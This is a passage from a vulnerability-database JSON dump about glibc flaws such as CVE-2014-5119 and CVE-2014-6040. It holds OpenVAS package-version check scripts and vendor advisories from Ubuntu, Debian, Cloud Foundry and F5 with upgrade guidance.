rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:12", "bulletinFamily": "scanner", "description": "Tavis Ormandy discovered a heap-based buffer overflow in the\ntransliteration module loading code in eglibc, Debian", "modified": "2019-03-19T00:00:00", "published": "2014-08-27T00:00:00", "id": "OPENVAS:1361412562310703012", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703012", "title": "Debian Security Advisory DSA 3012-1 (eglibc - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3012.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 3012-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703012\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-5119\");\n script_name(\"Debian Security Advisory DSA 3012-1 (eglibc - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-27 00:00:00 +0200 (Wed, 27 Aug 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-3012.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"eglibc on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), this problem has been fixed in\nversion 2.13-38+deb7u4.\n\nWe recommend that you upgrade your eglibc packages.\");\n script_tag(name:\"summary\", value:\"Tavis Ormandy discovered a heap-based buffer overflow in the\ntransliteration module loading code in eglibc, Debian's version of the\nGNU C Library. As a result, an attacker who can supply a crafted\ndestination character set argument to iconv-related character\nconversation functions could achieve arbitrary code execution.\n\nThis update removes support of loadable gconv transliteration modules.\nBesides the security vulnerability, the module loading code had\nfunctionality defects which prevented it from working for the intended\npurpose.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:49", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120169", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120169", "title": "Amazon Linux Local Check: ALAS-2015-495", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-495.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120169\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:19:06 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2015-495\");\n script_tag(name:\"insight\", value:\"An out-of-bounds read flaw was found in the way glibc's iconv() function converted certain encoded data to UTF-8. An attacker able to make an application call the iconv() function with a specially crafted argument could use this flaw to crash that application. (CVE-2014-6040 )It was found that the files back end of Name Service Switch (NSS) did not isolate iteration over an entire database from key-based look-up API calls. An application performing look-ups on a database while iterating over it could enter an infinite loop, leading to a denial of service. (CVE-2014-8121 )\");\n script_tag(name:\"solution\", value:\"Run yum update glibc to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-495.html\");\n script_cve_id(\"CVE-2014-6040\", \"CVE-2014-8121\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.139.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "description": "Off-by-one in __gconv_translit_find().", "modified": "2014-09-01T00:00:00", "published": "2014-09-01T00:00:00", "id": "SECURITYVULNS:VULN:13947", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13947", "title": "GNU glibc buffer overflow", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:53", "bulletinFamily": "software", "description": "\r\n\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2328-1\r\nAugust 29, 2014\r\n\r\neglibc vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nCertain applications could be made to crash or run programs as an\r\nadministrator.\r\n\r\nSoftware Description:\r\n- eglibc: GNU C Library\r\n\r\nDetails:\r\n\r\nTavis Ormandy and John Haxby discovered that the GNU C Library contained an\r\noff-by-one error when performing transliteration module loading. A local\r\nattacker could exploit this to gain administrative privileges.\r\n(CVE-2014-5119)\r\n\r\nUSN-2306-1 fixed vulnerabilities in the GNU C Library. On Ubuntu 10.04 LTS\r\nand Ubuntu 12.04 LTS the security update for CVE-2014-0475 caused a\r\nregression with localplt on PowerPC. This update fixes the problem. We\r\napologize for the inconvenience.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.04 LTS:\r\n libc6 2.19-0ubuntu6.3\r\n\r\nUbuntu 12.04 LTS:\r\n libc6 2.15-0ubuntu10.7\r\n\r\nUbuntu 10.04 LTS:\r\n libc6 2.11.1-0ubuntu7.16\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2328-1\r\n CVE-2014-5119\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/eglibc/2.19-0ubuntu6.3\r\n https://launchpad.net/ubuntu/+source/eglibc/2.15-0ubuntu10.7\r\n https://launchpad.net/ubuntu/+source/eglibc/2.11.1-0ubuntu7.16\r\n\r\n\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "modified": "2014-09-01T00:00:00", "published": "2014-09-01T00:00:00", "id": "SECURITYVULNS:DOC:31067", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31067", "title": "[USN-2328-1] GNU C Library vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:45", "bulletinFamily": "software", "description": "CVE-2014-5119 glib_gconv_translit_find() exploit\n\n# \n\nImportant\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Ubuntu 14.04 LTS \n * Ubuntu 12.04 LTS \n * Ubuntu 10.04 LTS \n\n# Description\n\nCertain applications could be made to crash or run programs as an administrator.\n\nOff-by-one error in the __gconv_translit_find function in gconv_trans.c in GNU C Library (aka glibc) allows context-dependent attackers to cause a denial of service (crash) or execute arbitrary code via vectors related to the CHARSET environment variable and gconv transliteration modules.\n\n# Affected Products and Versions\n\n_Severity is important unless otherwise noted. \n_\n\n * Cloud Foundry Runtime Deployments prior to v183 with BOSH Ubuntu stemcells prior to 2710 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry Project recommends that Cloud Foundry Runtime Deployments running Release v182 or earlier upgrade to v183 or later and BOSH Ubuntu stemcell 2710 or later, which resolves this vulnerability. \n\n# Credit\n\nThis issue was discovered by Tavis Ormandy and John Haxby.\n\n# References\n\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5119>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119>\n * <http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html>\n * <http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html>\n\n# History\n\n2014-Sep-19: Initial vulnerability report published.\n", "modified": "2014-09-19T00:00:00", "published": "2014-09-19T00:00:00", "id": "CFOUNDRY:2CAD2503E6F8FEFB9D3E259027678487", "href": "https://www.cloudfoundry.org/blog/cve-2014-5119/", "title": "CVE-2014-5119 glib_gconv_translit_find() exploit | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2016-09-26T17:23:17", "bulletinFamily": "software", "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you should permit access to F5 products only over a secure network, and limit login access to trusted users. For additional information, refer to SOL13092 - Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n", "modified": "2015-07-23T00:00:00", "published": "2015-04-01T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/300/sol16342.html", "id": "SOL16342", "title": "SOL16342 - GNU C Library (glibc) vulnerability CVE-2012-6656", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:20", "bulletinFamily": "software", "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you should permit access to F5 products only over a secure network, and limit login access to trusted users. For additional information, refer to SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n * SOL6664: Obtaining and installing OPSWAT hotfixes\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n", "modified": "2015-09-16T00:00:00", "published": "2015-04-14T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/400/sol16435.html", "id": "SOL16435", "title": "SOL16435 - GNU C Library vulnerability CVE-2014-6040", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:09:49", "bulletinFamily": "software", "description": "*Most ARX components are based on GNU C library code. \n\n\nRecommended action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2014-10-02T00:00:00", "published": "2014-10-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15640.html", "id": "SOL15640", "title": "SOL15640 - GNU C Library (glibc) vulnerabilities CVE-2014-0475, CVE-2014-5119, CVE-2013-4458", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-12T02:11:09", "bulletinFamily": "software", "description": " \n\n\n[CVE-2014-0475](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0475>)\n\nMultiple directory traversal vulnerabilities in GNU C Library (aka glibc or libc6) before 2.20 allow context-dependent attackers to bypass ForceCommand restrictions and possibly have other unspecified impact via a .. (dot dot) in a (1) LC_*, (2) LANG, or other locale environment variable.\n\n[CVE-2014-5119](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119>) \n\n\nOff-by-one error in the __gconv_translit_find function in gconv_trans.c in GNU C Library (aka glibc) allows context-dependent attackers to cause a denial of service (crash) or execute arbitrary code via vectors related to the CHARSET environment variable and gconv transliteration modules.\n\n[CVE-2013-4458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4458>)\n\nStack-based buffer overflow in the getaddrinfo function in sysdeps/posix/getaddrinfo.c in GNU C Library (aka glibc or libc6) 2.18 and earlier allows remote attackers to cause a denial of service (crash) via a (1) hostname or (2) IP address that triggers a large number of AF_INET6 address results. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-1914.\n\nImpact \n\n\nThis vulnerability may allow remote attackers to bypass restrictions and execute arbitrary code or cause a denial-of-service (DoS). \n\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:19:00", "published": "2014-10-02T23:35:00", "id": "F5:K15640", "href": "https://support.f5.com/csp/article/K15640", "title": "GNU C Library (glibc) vulnerabilities CVE-2014-0475, CVE-2014-5119, CVE-2013-4458", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:47", "bulletinFamily": "unix", "description": "Siddhesh Poyarekar discovered that the GNU C Library incorrectly handled certain multibyte characters when using the iconv function. An attacker could possibly use this issue to cause applications to crash, resulting in a denial of service. This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. (CVE-2012-6656)\n\nAdhemerval Zanella Netto discovered that the GNU C Library incorrectly handled certain multibyte characters when using the iconv function. An attacker could possibly use this issue to cause applications to crash, resulting in a denial of service. (CVE-2014-6040)\n\nTim Waugh discovered that the GNU C Library incorrectly enforced the WRDE_NOCMD flag when handling the wordexp function. An attacker could possibly use this issue to execute arbitrary commands. (CVE-2014-7817)", "modified": "2014-12-03T00:00:00", "published": "2014-12-03T00:00:00", "id": "USN-2432-1", "href": "https://usn.ubuntu.com/2432-1/", "title": "GNU C Library vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T17:22:18", "bulletinFamily": "unix", "description": "Tavis Ormandy and John Haxby discovered that the GNU C Library contained an off-by-one error when performing transliteration module loading. A local attacker could exploit this to gain administrative privileges. (CVE-2014-5119)\n\nUSN-2306-1 fixed vulnerabilities in the GNU C Library. On Ubuntu 10.04 LTS and Ubuntu 12.04 LTS the security update for CVE-2014-0475 caused a regression with localplt on PowerPC. This update fixes the problem. We apologize for the inconvenience.", "modified": "2014-08-29T00:00:00", "published": "2014-08-29T00:00:00", "id": "USN-2328-1", "href": "https://usn.ubuntu.com/2328-1/", "title": "GNU C Library vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:14", "bulletinFamily": "unix", "description": "Package : eglibc\nVersion : 2.11.3-4+deb6u2\nCVE ID : CVE-2012-6656 CVE-2014-6040 CVE-2014-7817\n\nCVE-2012-6656\n\n Fix validation check when converting from ibm930 to utf.\n When converting IBM930 code with iconv(), if IBM930 code which\n includes invalid multibyte character "0xffff" is specified, then\n iconv() segfaults.\n\nCVE-2014-6040\n\n Crashes on invalid input in IBM gconv modules [BZ #17325]\n These changes are based on the fix 